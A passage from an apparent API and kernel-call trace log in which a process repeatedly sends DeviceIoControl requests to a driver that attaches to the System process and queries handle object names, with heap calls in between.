lpOverlapped=0x0) returned 1 [0240.809] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.809] PsAcquireProcessExitSynchronization () returned 0x0 [0240.809] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.809] ObReferenceObjectByHandle (in: Handle=0xffffffff80000640, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f91550, HandleInformation=0x0) returned 0x0 [0240.809] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.809] PsReleaseProcessExitSynchronization () returned 0x2 [0240.809] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.809] ObQueryNameString (in: Object=0xfffffa8001f91550, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.809] ObfDereferenceObject (Object=0xfffffa8001f91550) returned 0x2 [0240.809] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.809] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.809] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.809] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.810] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.810] PsAcquireProcessExitSynchronization () returned 0x0 [0240.810] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.810] ObReferenceObjectByHandle (in: Handle=0xffffffff80000644, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed5e50, HandleInformation=0x0) returned 0x0 [0240.810] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.810] PsReleaseProcessExitSynchronization () returned 0x2 [0240.810] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.810] ObQueryNameString (in: Object=0xfffffa8001ed5e50, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.810] ObfDereferenceObject (Object=0xfffffa8001ed5e50) returned 0x2 [0240.810] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.810] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.810] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.810] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0240.810] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.810] PsAcquireProcessExitSynchronization () returned 0x0 [0240.810] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.810] ObReferenceObjectByHandle (in: Handle=0xffffffff80000648, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f90860, HandleInformation=0x0) returned 0x0 [0240.810] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.810] PsReleaseProcessExitSynchronization () returned 0x2 [0240.810] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.811] ObQueryNameString (in: Object=0xfffffa8001f90860, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.811] ObfDereferenceObject (Object=0xfffffa8001f90860) returned 0x2 [0240.811] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.811] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.811] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.811] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0240.811] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.811] PsAcquireProcessExitSynchronization () returned 0x0 [0240.811] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.811] ObReferenceObjectByHandle (in: Handle=0xffffffff8000064c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a18d00, HandleInformation=0x0) returned 0x0 [0240.811] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.811] PsReleaseProcessExitSynchronization () returned 0x2 [0240.811] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.811] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.811] ObfDereferenceObject (Object=0xfffffa8003a18d00) returned 0x1 [0240.811] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.811] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.811] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.811] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.811] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.812] PsAcquireProcessExitSynchronization () returned 0x0 [0240.812] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.812] ObReferenceObjectByHandle (in: Handle=0xffffffff80000650, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f902c0, HandleInformation=0x0) returned 0x0 [0240.812] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.812] PsReleaseProcessExitSynchronization () returned 0x2 [0240.812] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.812] ObQueryNameString (in: Object=0xfffffa8001f902c0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.812] ObfDereferenceObject (Object=0xfffffa8001f902c0) returned 0x2 [0240.812] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.812] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.812] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.812] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0240.812] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.812] PsAcquireProcessExitSynchronization () returned 0x0 [0240.812] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.812] ObReferenceObjectByHandle (in: Handle=0xffffffff80000658, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f8f660, HandleInformation=0x0) returned 0x0 [0240.812] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.812] PsReleaseProcessExitSynchronization () returned 0x2 [0240.812] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.812] ObQueryNameString (in: Object=0xfffffa8001f8f660, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.812] ObfDereferenceObject (Object=0xfffffa8001f8f660) returned 0x2 [0240.812] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.813] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.813] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.813] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.813] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.813] PsAcquireProcessExitSynchronization () returned 0x0 [0240.813] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.813] ObReferenceObjectByHandle (in: Handle=0xffffffff80000660, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f90050, HandleInformation=0x0) returned 0x0 [0240.813] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.813] PsReleaseProcessExitSynchronization () returned 0x2 [0240.813] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.813] ObQueryNameString (in: Object=0xfffffa8001f90050, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.813] ObfDereferenceObject (Object=0xfffffa8001f90050) returned 0x2 [0240.813] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.813] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.813] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.813] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0240.813] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.813] PsAcquireProcessExitSynchronization () returned 0x0 [0240.813] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.813] ObReferenceObjectByHandle (in: Handle=0xffffffff80000668, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f8e590, HandleInformation=0x0) returned 0x0 [0240.813] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.813] PsReleaseProcessExitSynchronization () returned 0x2 [0240.814] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.814] ObQueryNameString (in: Object=0xfffffa8001f8e590, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.814] ObfDereferenceObject (Object=0xfffffa8001f8e590) returned 0x2 [0240.814] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.814] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.814] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.814] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.814] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.814] PsAcquireProcessExitSynchronization () returned 0x0 [0240.814] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.814] ObReferenceObjectByHandle (in: Handle=0xffffffff8000066c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ecf400, HandleInformation=0x0) returned 0x0 [0240.814] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.814] PsReleaseProcessExitSynchronization () returned 0x2 [0240.814] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.814] ObQueryNameString (in: Object=0xfffffa8001ecf400, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.815] ObfDereferenceObject (Object=0xfffffa8001ecf400) returned 0x2 [0240.815] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.815] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.815] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.815] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.815] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.815] PsAcquireProcessExitSynchronization () returned 0x0 [0240.815] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.815] ObReferenceObjectByHandle (in: Handle=0xffffffff80000670, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f8ff20, HandleInformation=0x0) returned 0x0 [0240.815] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.079] PsReleaseProcessExitSynchronization () returned 0x2 [0241.079] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.079] ObQueryNameString (in: Object=0xfffffa8001f8ff20, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.079] ObfDereferenceObject (Object=0xfffffa8001f8ff20) returned 0x2 [0241.079] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.079] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.079] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.079] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.079] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.079] PsAcquireProcessExitSynchronization () returned 0x0 [0241.079] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.079] ObReferenceObjectByHandle (in: Handle=0xffffffff80000674, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003aa5f20, HandleInformation=0x0) returned 0x0 [0241.079] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.079] PsReleaseProcessExitSynchronization () returned 0x2 [0241.080] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.080] ObQueryNameString (in: Object=0xfffffa8003aa5f20, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.080] ObfDereferenceObject (Object=0xfffffa8003aa5f20) returned 0x2 [0241.080] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.080] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.080] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.080] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.080] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.080] PsAcquireProcessExitSynchronization () returned 0x0 [0241.080] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.080] ObReferenceObjectByHandle (in: Handle=0xffffffff80000678, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f8d460, HandleInformation=0x0) returned 0x0 [0241.080] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.080] PsReleaseProcessExitSynchronization () returned 0x2 [0241.080] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.080] ObQueryNameString (in: Object=0xfffffa8001f8d460, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.080] ObfDereferenceObject (Object=0xfffffa8001f8d460) returned 0x2 [0241.080] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.080] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.080] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.080] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.080] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.080] PsAcquireProcessExitSynchronization () returned 0x0 [0241.080] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.080] ObReferenceObjectByHandle (in: Handle=0xffffffff8000067c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f56460, HandleInformation=0x0) returned 0x0 [0241.081] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.081] PsReleaseProcessExitSynchronization () returned 0x2 [0241.081] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.081] ObQueryNameString (in: Object=0xfffffa8001f56460, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.081] ObfDereferenceObject (Object=0xfffffa8001f56460) returned 0x2 [0241.081] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.081] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.081] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.081] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.081] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.081] PsAcquireProcessExitSynchronization () returned 0x0 [0241.081] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.081] ObReferenceObjectByHandle (in: Handle=0xffffffff80000680, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f8ee50, HandleInformation=0x0) returned 0x0 [0241.081] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.082] PsReleaseProcessExitSynchronization () returned 0x2 [0241.082] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.082] ObQueryNameString (in: Object=0xfffffa8001f8ee50, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.082] ObfDereferenceObject (Object=0xfffffa8001f8ee50) returned 0x2 [0241.082] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.082] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.082] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.082] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0241.082] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.082] PsAcquireProcessExitSynchronization () returned 0x0 [0241.082] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.082] ObReferenceObjectByHandle (in: Handle=0xffffffff80000684, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002152810, HandleInformation=0x0) returned 0x0 [0241.082] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.082] PsReleaseProcessExitSynchronization () returned 0x2 [0241.082] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.082] ObQueryNameString (in: Object=0xfffffa8002152810, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.082] ObfDereferenceObject (Object=0xfffffa8002152810) returned 0x2 [0241.082] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.082] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.082] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.082] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.082] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.082] PsAcquireProcessExitSynchronization () returned 0x0 [0241.082] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, 